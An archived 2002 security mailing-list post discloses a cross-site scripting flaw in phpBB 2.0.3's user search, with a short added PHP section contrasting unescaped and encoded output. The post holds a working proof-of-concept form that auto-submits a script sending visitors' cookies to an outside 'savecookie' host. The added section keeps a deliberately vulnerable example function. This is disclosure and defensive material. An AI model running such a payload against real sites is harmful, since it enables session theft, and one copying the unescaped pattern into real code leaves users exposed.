Cross-site Scripting Vulnerability in phpBB 2.0.3

From: Fabricio Angeletti (f_a_aat_private)
Date: Tue Dec 03 2002 - 12:09:00 PST

    Hello :)
    
    here is the code
    ----------------
    <html>
    <body>
    <form method="post" name="search"
    action="http://target/search.php?mode=searchuser">
    <input type="hidden" name="search_username" value=""/>
    
    </form>
    <SCRIPT>
    search.search_username.value='http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>';
    document.search.submit();
    </script>
    </body>
    </html>
    ------------
    works for me using IE 6 SP1 (XP)
    
    maybe you can do this in a better way, but this
    example works really fine
    
    the problem is search.php: when it shows search_username you
    can put anything, with a few restrictions
    
    solution:
    1 Don't show the last entry or something like that
    2 filter the code :p
    
    Bye
    
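Added example, not part of the original message and not phpBB's own code: a sketch of the "filter the code" fix, showing a handler that echoes search_username back unescaped next to one that encodes it for the HTML attribute context. It assumes the value is reflected inside an input's value attribute (as the `">` prefix in the posted form suggests); the function names, the 25-character limit and the allowed character set are hypothetical.

```php
<?php
// Hypothetical reconstruction of the pattern described in the message,
// NOT phpBB's actual search.php.

// Vulnerable pattern: the submitted value is written back verbatim, so a
// double quote in the input ends the attribute and markup after it is parsed.
function render_field_unescaped(string $username): string
{
    return '<input type="text" name="search_username" value="' . $username . '" />';
}

// Hardened pattern: encode on output for the attribute context.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
// byte sequences instead of returning an empty string.
function render_field_encoded(string $username): string
{
    $encoded = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search_username" value="' . $encoded . '" />';
}

// Defence in depth: accept only what a username search needs.
// Allowed set and length are assumptions chosen for this example.
function normalize_search_username(string $raw): string
{
    $raw = trim($raw);
    return preg_match('/^[A-Za-z0-9 _*-]{1,25}$/', $raw) === 1 ? $raw : '';
}

// Constructed, harmless probe: a quote and a tag, no script.
$probe = 'x"><b>probe</b>';

echo "unescaped: ", render_field_unescaped($probe), "\n";
echo "encoded:   ", render_field_encoded($probe), "\n";
echo "validated: '", normalize_search_username($probe), "'\n";
echo "validated: '", normalize_search_username('Fabricio*'), "'\n";
```

Output encoding is the fix that closes the hole; the input check only narrows what reaches the template and should not replace it.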
    



    This archive was generated by hypermail 2b30 : Thu Dec 05 2002 - 13:11:52 PST